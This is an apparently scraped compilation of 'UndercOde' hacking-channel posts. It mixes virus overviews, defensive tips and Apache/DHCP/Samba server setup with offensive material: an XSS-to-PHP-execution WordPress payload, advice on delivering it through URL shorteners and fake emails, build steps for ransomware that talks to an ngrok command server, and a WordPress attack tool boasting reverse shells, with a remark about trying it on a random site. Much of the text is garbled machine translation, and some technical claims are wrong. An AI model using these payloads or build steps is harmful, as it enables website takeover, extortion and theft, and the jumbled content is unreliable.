▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Virus-malwares types
twitter.com/UndercOdetc

1) File viruses. Such viruses attach their own code to executable files (EXE, COM, BAT ...). A typical representative is " Black Friday ".

2) Guided virus . This type of virus inserts virus instructions into the boot sector , master boot record, or partition table of a hard disk . Typical representatives are cannabis virus , disk killer, etc.

3) Mixed viruses . Is a hybrid of the first two viruses, and quickly spread online through executable files .

4) Macro virus. In August 1995, Windows 95 was released, and it quickly became the mainstream operating system . Various viruses that had been under the DOS system for a while, gradually lost their vitality because they did not adapt to the new system. One new type of virus that has replaced it is one that also attacks executable files , such as the notorious CIH virus, and the other is macro viruses, which mainly infect macros defined by word processing software (such as Word) that is widely used daily . And thus spread rapidly. Melissa is the "outstanding" representative in this regard.

5) Network viruses . Network viruses spread through websites and emails . They are hidden in Java and ActiveX programs. If a user downloads a program with the virus, they immediately begin to disrupt activities. Due to the rapid spread of the Internet, this type of virus is even more harmful. Recently, activities have been rampant, and the destructive "love" virus belongs to this category.

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Judge poisoning


1) security tools do not run

2) Online anti-virus web pages and files cannot be opened

3) Crashes with insufficient memory

4) Task manager, startup items are abnormal

5) Hard disk light, network card light flashing wildly

6) QQ, MSN, abnormal online game login

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Malwares controle :
>Because viruses cause serious damage to microcomputer resources, effective measures must be taken from both management and technical aspects to prevent virus intrusion.
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

In daily work, the main measures to prevent virus infection are:

1) First, and most importantly, choose and install an anti-virus software . As new viruses continue to appear (on average 13 a day), in today's highly shared and highly networked world, a computer must With anti-virus software installed, it is difficult to avoid virus attacks. Regularly check the microcomputers used, including the floppy disks and hard disks used, in order to detect viruses in time and prevent them before they occur.

2) Reduce the user's write power in the server. Keeping the power written in the server in the hands of as few people as possible can avoid unnecessary trouble and loss.

3) Prevent floppy disks and pirated optical disks of unknown origin. You should be extremely vigilant against floppy disks and pirated discs of unknown origin. Think carefully before you plug it into the drive. If you have to do so, first check the usb disk with anti-virus software and scan every file on the disk (not only Executable files only ), including compressed files . Similarly, when you give someone a dvd disk , write-protect the dvd disk in time so that viruses in other people's machines will not be transmitted to your dvd disk.

4) Scan the email before reading it . Some mail receiving software will automatically open the attachment after the user opens an email. Please turn off this function.

5) Be careful when downloading. Download files are one source of viruses.

Save the file in RTF or ASCII format. If you want to share some data with others on the network server , but do not want to know more about virus, then you better save the file as RTF or ASCII format, because these two file formats can avoid macro virus attacks .

6) Set up hard disk partitions reasonably and reserve remedial measures. Generally, the C drive should use FAT 32 format, and the capacity should be greater than 20 G. At this time, if the C drive is infected by a virus, more than 98% of the data can be recovered with the KV300, while using the FAT16 format, the C drive capacity is less than 20 G, and only 5% of the data can be recovered.
Use Ghost (clone) software and back up the hard disk to quickly restore the system.
or system windows settings

7) Upgrade anti-virus software in a timely manner and improve defense capabilities.

8) Important data and important files must be backed up- offline or cloud

9) check firewalls

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 CVSS Scores & Vulnerability Types windows server 2019 :
> The Common Vulnerability Scoring System (CVSS) is a free and open industry standard for assessing the severity of computer system security vulnerabilities. CVSS attempts to assign severity scores to vulnerabilities, allowing responders to prioritize responses and resources according to threat.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

CVSS Score 2.1

Confidentiality Impact Partial (There is considerable informational disclosure.)

Integrity Impact None (There is no impact to the integrity of the system)


Availability Impact None (There is no impact to the availability of the system.)

Access Complexity Low (Specialized access conditions or extenuating circumstances

do not exist. Very little knowledge or skill is required to exploit. )

Authentication Not required (Authentication is not required to exploit the vulnerability.)

Gained Access None

Vulnerability Type(s) Bypass a restriction or similar
CWE ID 20

🦑 Effects :

1) The Common Vulnerability Scoring System (CVSS) provides a way to capture the principal characteristics of a vulnerability and produce a numerical score reflecting its severity.

2) The numerical score can then be translated into a qualitative representation (such as low, medium, high, and critical) to help organizations properly assess and prioritize their vulnerability management processes.

3) CVSS is a published standard used by organizations worldwide, and the SIG's mission is to continue to improve it.


@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Wordpress bruteforce :lastest tool
t.me/UndercOdeTesting

1) Brute Force via API, not login form bypassing some forms of protection

2) Can automatically upload an interactive shell

3) Can be used to spawn a full featured reverse shell

4) Dumps WordPress password hashes

5) Can backdoor authentication function for plaintext password collection

6) Inject BeEF hook into all pages

7) Pivot to meterpreter if needed

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) sudo apt install python3-pip python3-libtorrent python3-coloredlogs

2) git clone https://github.com/BlackArch/wordlistctl

3) cd wordlistctl

4) Open the requirements.txt file

> gedit requirements.txt
And remove the line from there

libtorrent

5) Then continue:

> sudo pip3 install -r requirements.txt

> python3 ./wordlistctl.py

🦑 In BlackArch, this program is in the standard repository – install directly

> sudo pacman -S wordlistctl

wordlistctl -S rus

--==[ wordlistctl by blackarch.org ]==--

[*] searching for rus in urls.json

[+] wordlist russian_users found: id=842
[+] wordlist rus_surnames_date099_fin found: id=1022
[+] wordlist rus_surnames_first_letter found: id=1046
[+] wordlist rus_surnames_fin found: id=1094
[+] wordlist rus_surnames_date19002020_fin found: id=1104
[+] wordlist rus_names_date099_fin found: id=1163
[+] wordlist rus_names_translit found: id=1185
[+] wordlist rus_cities_translit found: id=1206
[+] wordlist rus_names_date19002020_fin found: id=1209
[+] wordlist rus_eng found: id=1245
[+] wordlist rus_names_fin found: id=1278
[+] wordlist rus_mat found: id=1316
[+] wordlist rus_latin found: id=1323
[+] wordlist rus_names_kb_chage found: id=1324

6) mkdir wordlists

> And download to this folder (-d wordlists) a dictionary that has the identifier 1714 (-f 1714), unpack it and delete the original archive (-Xr):

>wordlistctl -f 1714 -d wordlists -Xr

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

Tried on random ruso site to test it

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Apache-Team development environment setup: dhcp + apache + ftp + cvs + samba :
Let s introduce those therms :
instagram.com/UndercOdeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> Many of these services are based on the fact that most development clients are still set by Windows. Each service provides a simple basic configuration demonstration. Including:

1) IP management (DHCP): management and analysis of server IP address (combined with SAMBA WINS service), development of client IP management; WEB service (APACHE): document sharing, CVS web interface browsing, forum tools, etc .;

2) FTP service (FTP): for file download / share;

version control (CVS): version control of program source code and documentation;

> File sharing (SAMBA): NETBIOS-based file sharing for easy access by Windows clients (such as the installation of some tools); Database server (MYSQL): a background database service for some applications; Backup mechanism (wget + rsync): Back up

3) many settings It is the default. In the bash environment and in the tcsh environment, some settings are not constant.

🦑 Server plan as follows:


Primary Server (Main) backup server (Backup)
__________________ _______________
| APACHE the WEB SERVER | | File Backup |
| SAMBA SHARE | | |
| the DHCP SERVER | | the DHCP Backup |
| CVS SERVER | | MySQL Server |
| GNATS SERVER | | |
| PHORUM SERVER | | |
| Database backup | | |
------------------ ---------------

4) Hardware Preparation : At least 2 servers

In theory, any system crash is only a matter of time, and no one can guarantee that the developer will not make a mistake

. The only solutions are: backup, backup, backup ... The

operating system prepares

5) FreeBSD or GNU / Liunx. When the system is installed, the configuration of this article Take RedHat as an example. Note: When installing, select the "Development Tools" category. Many of the following tools need to be compiled with GCC. Some application scripts use PERL. The two master servers use IP addresses 192.168.0.200 and 192.168.0.201, respectively.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Let s configure our apache server config :

<> dhcp + apache + ftp + cvs + samba :
twitter.com/UndercOdeTC/

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Services installed on both machines: SSH FTP DHCP service

SSH: Basic login service. For internal development, it is generally acceptable to use the default, but it is recommended to

2) change : PermitRootLogin yes in / etc / ssh / sshd_config PermitRootLogin no

3) FTP: If it is FREEBSD, it is recommended to use PROFTPD instead: http://www.proftpd.org/Install (if service down try later )

tar zxf proftpd-version.tar.gz
cd proftpd-version /
./configure
make
make install

4) Default configuration / usr /local/etc/proftpd.conf


> ServerName "ProFTPD"
ServerType standalone
DefaultServer on
AllowOverwrite on
Port 21
Umask 022 #Do
not reverse resolve the domain name of the login machine
UseReverseDNS off
MaxInstances 30
User nobody
Group nogroup

5) DHCP service: In order to more easily manage the developer's IP address and server IP address in the same LAN, the most It is good to arrange the server within a certain range of static IP (such as above 192.168.0.200), and provide a dynamic IP for the client of the development machine within the range of (192.168.0.10-200). Assume that our main server (192.168.0.200) and auxiliary development server (192.168.0.201) use static IP, and provide dynamic IP allocation services for 192.168.0.10-200 in the network segment. The DHCP service is installed on both servers.


6) One is the master DHCP service, which is used to provide 70% of the IP to the subnet IP pool, and the other is used for backup, which has 30% of the IP pool. In the example: 200 is responsible for 10-100 and 201 is responsible for 110-150. If dhcpd is not installed by default, find the DHCP software package from the installation disk or download the source file from http://www.isc.org and compile it (the installation location and configuration file may be different).

7) Default configuration: on the master server

ddns-update-style none;
default-lease-time 120000;
max-lease-time 920000;
option subnet-mask 255.255.255.0;
option broadcast-address 192.168.0.255;
option netbios-name-servers 192.168.0.200;
option routers 192.168 .0.1;
Option-name-Domain Servers 202.106.196.115,202.96.199.133;
; "the example.com" Option name-Domain

Subnet 192.168.0.0 Netmask 255.255.255.0 {
Range 192.168.0.10 192.168.0.100;
}

8) Note:

The default per IP leases for 2 days: default-lease-time 120000;

longest lease: max-lease-time 920000;

default subnet mask: option subnet-mask 255.255.255.0;

default broadcast address: option broadcast-address 192.168.0.255;

9) Enable the samba service on 192.168.0.200 to enable the WINS service: for internal domain name resolution: option netbios-name-servers 192.168.0.200;

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Default Configuration should be in server
pinterest.com/UndercOdeOfficial

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) default gateway option routers 192.168.0.1;

2) default domain name server option domain-name-servers 202.106.196.115 , 202.96.199.133; The

3) default domain name option domain-name "example.com"; #A

4) default subnet setting:
subnet 192.168.0.0 netmask 255.255.255.0 {
# Dynamically allocate 0.10-100 IP
range 192.168. For the subnet 0.10 192.168.0.100;
} The

5) only difference on the secondary DHCP server is that the subnet is dynamically assigned an IP of 0.110-150, and the IP pools of the primary DHCP and the attached DHCP server cannot overlap each other


subnet 192.168.0.0 netmask 255.255.255.0 {
range 192.168 .0.110 192.168.0.150;
}

🦑 Application installation on the main server:

SAMBA service: used for file sharing and internal WINS analysis

Here is just a simple configuration for read-only sharing,


[global]
#Other people will see through "My Network Places" In the WORKGROUP group


1) Linux machine, the comment is: My Samba Server
workgroup = WORKGROUP
netbios name = linux
server string = My Samba Server #log

2) settings
log file = /var/log/samba/%m.log
max log size = 50 #Security

3) settings
security = share

#Use SAMBA's WINS service support, and use / etc / hosts for internal domain name resolution
wins support = yes
name resolve order = hosts lmhosts wins bcast
dns proxy = yes

[public] #A
shared setting
comment = Public Stuff
path = / home / share
public = yes
guest ok = yes
read only = yes
writable = no
printable = no

4) In order to let everyone use dev.example.com to access the main server (192.168.0.200) internally, I use DHCP to set the main server (192.168.0.200) as the internal WINS server, and in the 200 SAMBA service, WINS support is enabled, and WINS is set to use DNS for NETBIOS name resolution. In this way, if the DNS reads the settings in the / etc / hosts file, the hosts file can be used as the WINS domain name configuration file, which is set in / etc / hosts:


192.168.0.200 dev.example.com bbs.example. After com dev bbs
192.168.0.201 bak.example.com backup

, the intranet client that obtained the IP through DHCP can directly access the development server through: dev.example.com.

5) used abbreviations for all machine name prefixes: dev, bbs bak, etc. The reason is that the NMBD of samba is actually the resolution of the NETBIOS name, and the name length is limited to 16 characters (actually 15). Therefore, although 192.168.0.202 username.example.com is a legal DNS name resolution, because username.example.com is longer than 16 characters, it cannot be found through SAMBA WINS service resolution. dev.chedong.com is equivalent to a machine like dev.chedong.com. When I used SAMBA's WINS analysis, the client always couldn't ping test.chedong.com. This problem bothered me for a while.


Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 WEB service: APACHE-lastest config-usage... :
twitter.com/UndercOdeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) It is mainly used for file WEB sharing and front-end browsing of some applications (CVSWEB GNATSWEB PHPMYADMIN, etc.). Apache, 1.3 is still used here, because many applications, such as PHP running on 2.0, are not complete.

Installation: http://httpd.apache.org Download the latest version:

2) Compile options: This allows all modules to be dynamically loaded through the configuration file, which is convenient for adding and removing other application modules later: ./configure --prefix = / home / apache --enable-shared = max --enable-module = most More installation instructions can refer to: APACHE installation notes

🦑 Document sharing tips:

1) For the sharing of documents, the autoindex module is very useful, let APACHE automatically index the directory by default Sort by file / directory name, and more than 40 characters of the file name are truncated. In order to display the complete file name, and like the Explorer, the directory is ranked first, and the file is ranked behind:

2)in the module settings :


#Add NameWidth option, and the file name length is * (Automatically adapted #should
be the longest file name in the current directory)
#Add FoldersFirst option, let the directory be listed in front (similar to Explorer)
#Added ScanHTMLTitles for HTML files TITLE do
the description of file #, and set the description length to * (the longest adaptive)
IndexOptions FancyIndexing + NameWidth = *
FoldersFirst S canHTMLTitles + DescriptionWidth = *

3) If it is CGI development, how to enable users to publish CGI programs in their own directory, such as: http://192.168.0.200/~chedong/cgi-bin/my_cgi: In the module settings, add a regular expression: ScriptAliasMatch ~ ([az] +) / cgi-bin /(.*) / home / $ 1 / cgi-bin / $ 2

means match ~ user_name / cgi-bin / cgi_name is automatically mapped to / home / user_name / cgi-bin / cgi- script name

version control: CVS

CVS default on almost all servers installed, as long as you can initialize the following steps:

in / etc / profile Lane:

master CVS repository resides settings:


Export CVSROOT = / Home / cvsroot

4) in other Settings in the development server:


export CVSROOT =: ext: $USER@192.168.0.200: / home / cvsroot
export CVS_RSH = ssh

and then initialize cvs init on the main server:

5) For the settings of CVSWEB, repeat the content of CVSWEB in the following CVS common command manual :

Download of CVSWEB: CVSWEB has evolved from the original version to a lot of richer functional interface versions. This is personally convenient to install and set up: http://www.spaghetti-code.de/software/linux/cvsweb/

6) Download Unpacking:


tar zxf cvsw eb.tgz

7) You can also customize the description information in the header of the conf. You can modify $ long_intro to the text you need. The first thing that CVS can put into the library is the installation documentation of the above system. For more extended applications of CVS, please refer to the CVSTRAC section of the CVS common command manual. Resource sharing between multiple services Generally can be resolved through links, for example: I want anonymous ftp shared content (such as in the / var / ftp / pub directory) can be published by WEB, ln -s / var / ftp / pub / home / apache / htdocs / pub

🦑
　　I hope that the documents in / usr / share / doc can be browsed through the WEB:


　　ln -s / usr / share / doc / home / apache / htdocs / doc

　　I hope that the content published by the WEB can also be accessed through the Windows network neighbors: suppose / home / share is the read-only share path published by samba.


　　ln -s / home / apache / htdocs / home / share

　　service starts automatically:

　　services already installed on the system can generally be configured to automatically start through the setup service configuration. Otherwise, it is located at / Add some startup scripts in etc / rc.local.


Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 example for writing the following script in the ROOT CRON of the main server
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

#time sync
0 5 * * 1 (/ usr / bin / rdate -s YOUR_DATE_TIME_SERVER)

#backup gnats
6 3 * * * (cd / home; tar cf
/home/backup/gnats.date + \% w.tar gnats) #backup

cvsroot
5 3 * * * (cd / home; tar cf
/home/backup/cvsroot.date + \% w .tar cvsroot)

#backup apache
8 3 * * * (cd / home; tar cf
/home/backup/apache.date + \% w.tar apache)

#gzip all backup
50 3 * * * (gzip -f / home / backup / *. tar)

#webalizer demo
3 5 * * * (/ usr / local / bin / webalizer -c /home/apache/conf/webalizer.conf
/ home / apache / logs / `date -d yesterday +
% w` / access_log)

#remove last week log
3 4 * * * (find / home / apache / logs / -name
access_log -mtime +6 -exec rm -f {};) In

🦑 this way, there will be weekly rotation training in the / home / backup directory 7 backups. Then by setting CRON on the secondary server, use the -m option of wget to mirror the / home / backup directory on the primary server or use rsync to synchronize. The next two are about the log statistics of the server using webalzier, and the logs of APACHE are rotated through cronolog. Please refer to the specific settings

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 AFTER THOSE TUTORIALS YOU ARE ABLE TO CONFIG ANY APACHE SERVER AND FULL UNDERSTANDING HOW THEY WORKS
E N J O Y @UndercOdeTesting

🦑No One Have Permission to clone UndercOde Tutorials

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Wi-Fi vulnerability Kr00k exposure: billions of devices worldwide affected CVE
recently from Underc0de Tweets @UndercOdeTC

1) Wi-Fi chips manufactured by Cypress Semiconductor and Broadcom have serious security vulnerabilities, making billions of devices around the world very vulnerable to hackers, allowing attackers to decrypt the airborne transmissions around him. Sensitive data.

2) The vulnerability was made public during the RSA Security Conference that opened today. For Apple users, this issue has been resolved in the iOS 13.2 and macOS 10.15.1 updates released in late October last year.

3) The security company ESET detailed this vulnerability at the RSA conference. Hackers can use a vulnerability called Kr00k to interrupt and decrypt WiFi network traffic. The vulnerability exists in Wi-Fi chips from Cypress and Broadcom, which are two major brands with high global market shares, which are widely used from laptops to smartphones, from APs to IoT devices.

4) Among them are Amazon Echo and Kindle, Apple's iPhone and iPad, Google's Pixel, Samsung's Galaxy series, Raspberry Pi, Xiaomi, Asus, Huawei and other brand products are used. A conservative estimate is that one billion devices worldwide are affected by the vulnerability.

5) After the hacker successfully exploited this vulnerability, he could intercept and analyze the wireless network data packets sent by the device. Ars Technica stated:

6) Kr00k exploits a vulnerability that occurs when a wireless device disconnects from a wireless access point. If an end-user device or AP hotspot is attacked, it will put all unsent data frames into the send buffer and then send them wirelessly. Instead of using a session key previously negotiated and used during normal connections to encrypt this data, the vulnerable device uses a key consisting of all zeros, which makes decryption impossible.

7) A good thing is that the Kr00k error only affects WiFi connections encrypted using WPA2-Personal or WPA2-Enterprise security protocols and AES-CCMP. This means that if you use Broadcom or Cypress WiFi chipset devices, you can prevent hackers from using the latest WiFi authentication protocol WPA3 to attack.

8) According to ESET Research, which released detailed information about the vulnerability, the vulnerability has been disclosed to Broadcom and Cypress along with potentially affected parties. Currently, device patches for most major manufacturers have been released.


Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 XSS in WordPress: a tutorial Full by UndercOde :
1) One of the most common vulnerabilities in WordPress plugins is cross site scripting – XSS for short. The basic premise of XSS is that an attacker is able to cause JavaScript to run in somebody else’s browser, while they’re on a website that the attacker shouldn’t be able to control.
2) By the end of this, you’ll have introduced a vulnerability, proven that it’s vulnerable
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Make your site vulnerable
(Tip: Probably best not to do this on a production site)
There are many ways to make your site vulnerable to XSS. But in the interest of brevity, we’ll choose the quickest and easiest way to do it. Create a new post on your WordPress site, as an admin user, switch the editor into Text mode, and add this and click publish:

<script>eval(window.location.hash.substring(1))</script>
Congratulations, your site is vulnerable to XSS.

2) Writing a malicious payload
We can do a lot of things. We could create a new user, we could delete all the posts, but today let’s do the worst thing possible and execute arbitrary code on the server.

> By default, WordPress lets you edit theme and plugin files. You absolutely should turn this off. Somebody with malicious intentions can do a lot of damage with it. As we’re about to find out…

3) You can edit the current theme’s functions.php file from /wp-admin/theme-editor.php?file=functions.php

4) Open up your devtools and execute this (no really, don’t do this on your production site!):

nc=document.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()
Ooh, that’s going to be annoying. We haven’t done too much damage though, so open up functions.php in your text editor and remove the defacement (i.e. replace the first line with <?php).

5) Now we have a proof of concept and a malicious payload we want to execute. We just need to put those pieces together, along with a little extra JavaScript to open that page in an iframe, and we’ll have something ready to do some damage…

6) Visit your vulnerable page, and add the following to the end of the URL (you may need to refresh after doing that):

#i=document.createElement('iframe');document.body.appendChild(i);i.src='/wp-admin/theme-editor.php?file=functions.php';window.setTimeout(function(){nc=i.contentDocument.querySelector('#newcontent');nc.value='<?php echo "HACK THE PLANET";phpinfo();exit()?>'+nc.value;nc.form.submit.click()},3000)
Now you’ve defaced your entire site just by following a link. If you can run arbitrary JavaScript on a WordPress site you can do virtually anything an admin user can do, including (by default) execute arbitrary PHP.

7) Delivery
To deliver your link you’ll need to use some social engineering.

Firstly, a URL shortener is handy – a bit.ly link might look suspicious, but less suspicious than a huge URL full of JavaScript.

You could make an email that looks exactly like a Facebook notification. You could even buy a domain name, set it up to redirect to the malicious URL, and rent a billboard outside their office. Get creative.

🦑 exploit that does a bit of damage.

We learnt that if you can run alert(1) then you can probably run any JavaScript.

We’ve also learnt that by default, an XSS vulnerability in WordPress allows attackers to run arbitrary PHP code. This is why XSS in WordPress is particularly dangerous.

🦑Proof of concept
I claimed that your site is vulnerable to XSS, but is it really? Don’t take my word for it, let’s prove it.

Visit the page you just created, and then add #alert(1) to the end of the URL. (You may need to refresh after doing that).

You should see an alert box saying “localhost says: 1” or just “1”.

This is called a “proof of concept”. We’ve proven that we can control the JavaScript running on this site without being admins.

Written by Underc0de
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Ransomware Updated Tutorial :
t.me/UndercOdeTesting

🦑 Features :

1)Run in Background (or not)

2) Encrypt files using AES-256-CTR(Counter Mode) with random IV for each file.
Multithreaded.

3) RSA-4096 to secure the client/server communication.

4) Includes an Unlocker.

5) Optional TOR Proxy support.

6) Use an AES CTR Cypher with stream encryption to avoid load an entire file into memory.

7) Walk all drives by default.

8) Docker image for compilation.

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) download the project outside your $GOPATH:

2) git clone github.com/mauri870/ransomware

3) cd ransomware
If you have Docker skip to the next section.

4) You need Go at least 1.11.2 with the $GOPATH/bin in your $PATH and $GOROOT pointing to your Go installation folder. For me:

export GOPATH=~/gopath
export PATH=$PATH:$GOPATH/bin
export GOROOT=/usr/local/go
Build the project require a lot of steps, like the RSA key generation, build three binaries, embed manifest files, so, let's leave make do your job:

5) make deps
make

6) You can build the server for windows with make -e GOOS=windows.

🦑 Docker

./build-docker.sh make

Config Parameters

7) You can change some of the configs during compilation. Instead of run only make, you can use the following variables:

HIDDEN='-H windowsgui' # optional. If present the malware will run in background

USE_TOR=true # optional. If present the malware will download the Tor proxy and use it to contact the server

SERVER_HOST=mydomain.com # the domain used to connect to your server. localhost, 0.0.0.0, 127.0.0.1 works too if you run the server on the same machine as the malware

SERVER_PORT=8080 # the server port, if using a domain you can set this to 80

GOOS=linux # the target os to compile the server. Eg: darwin, linux, windows
Example:

make -e USE_TOR=true SERVER_HOST=mydomain.com SERVER_PORT=80 GOOS=darwin

The SERVER_ variables above only apply to the malware. The server has a flag --port that you can use to change the port that it will listen on.

DON'T RUN ransomware.exe IN YOUR PERSONAL MACHINE, EXECUTE ONLY IN A TEST ENVIRONMENT! I'm not resposible if you acidentally encrypt all of your disks!

🦑How it Works :

1) First of all lets start our external domain:

ngrok http 8080
This command will give us a url like http://2af7161c.ngrok.io. Keep this command running otherwise the malware won't reach our server.

2) Let's compile the binaries (remember to replace the domain):

make -e SERVER_HOST=2af7161c.ngrok.io SERVER_PORT=80 USE_TOR=true
The SERVER_PORT needs to be 80 in this case, since ngrok redirects 2af7161c.ngrok.io:80 to your local server port 8080.

3) After build, a binary called ransomware.exe, and unlocker.exe along with a folder called server will be generated in the bin folder. The execution of ransomware.exe and unlocker.exe (even if you use a diferent GOOS variable during compilation) is locked to windows machines only.

4) Enter the server directory from another terminal and start it:

cd bin/server && ./server --port 8080

5) To make sure that all is working correctly, make a http request to http://2af7161c.ngrok.io:

curl http://2af7161c.ngrok.io
If you see a OK and some logs in the server output you are ready to go.

6) Now move the ransomware.exe and unlocker.exe to the VM along with some dummy files to test the malware. You can take a look at cmd/common.go to see some configuration options like file extensions to match, directories to scan, skipped folders, max size to match a file among others.

Then simply run the ransomware.exe and see the magic happens

🦑 I Post this ransoware tutorial from his git link for learn not for harm

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Detailed hack into LINUX server-part 1 (plan)
>Crack the password

1) In the UNIX operating system, all system user passwords are stored in a file, this file is stored in the / etc directory, its file name is called passwd.

2) If the reader thinks that the work to be done is to get this file and log in to the system with the above password, then it is very wrong. The psswd file under UNIX and Linux is special.

3) The passwords of all accounts in it have been recompiled (that is, the DES encryption method mentioned earlier), and these passwords are compiled unidirectionally (one -way encrypted), which means there is no way to decompile it.

4) there are programs that can get these raw passwords. The author recommends a cracker program "Cracker Jack", which is also a software that uses a dictionary to exhaust the dictionary files.

5) "Cracker Jack" will compile each value in the dictionary file, and then compare the compiled value with the content in the password file.

6) If the same result is obtained, the corresponding uncompiled password will be reported. This software cleverly bypasses the limitation that passwords cannot be decompiled, and uses exhaustive comparison to obtain passwords. There are many tools for obtaining passwords using this principle, and readers can search on the Internet.
t.me/UndercOdeTesting

Written by UndercOde
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁